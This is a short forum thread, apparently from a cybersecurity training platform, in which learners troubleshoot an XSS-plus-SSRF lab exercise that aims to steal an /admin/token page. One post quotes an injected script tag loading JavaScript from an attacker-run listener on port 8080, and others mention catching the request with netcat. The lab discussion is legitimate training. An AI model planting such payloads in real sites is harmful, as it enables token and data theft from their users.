Forum Discussion

Bronze I

10 months ago

Solved

Cross-Site Scripting: Ep.6 – Further Exploitation

I was stuck in one question looking for HINT. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.

help & support

CyberSharpe
9 months ago
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.

natelott

Bronze I

10 months ago

Having the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.

Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.

Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>

Forum Discussion

Cross-Site Scripting: Ep.6 – Further Exploitation

Featured Places

Help & Support Forum

Related Content

Re: Cross-Site Scripting: Ep.6 – Further Exploitation

Pen Test CTFs: Jinja2 Exploitation

Human Connection Challenge: Season 1 – Web Exploitation - XSS

Zeek Ep 4 Scripting

Fundamental AI Algorithms: Decision Trees Script Detection Question 6

Recent Discussions

Help with Introduction to Python Scripting: Ep.7 – Demonstrate Your Skills

Privilege Escalation: Windows – Finding Passwords

Microsoft Defender for Cloud: Inventory, Resource Health and Recommendations.

Malware Analysis: Shlayer

CSP Hash Incorrect Despite Correct Script and Hash (CSP Lab Issue?)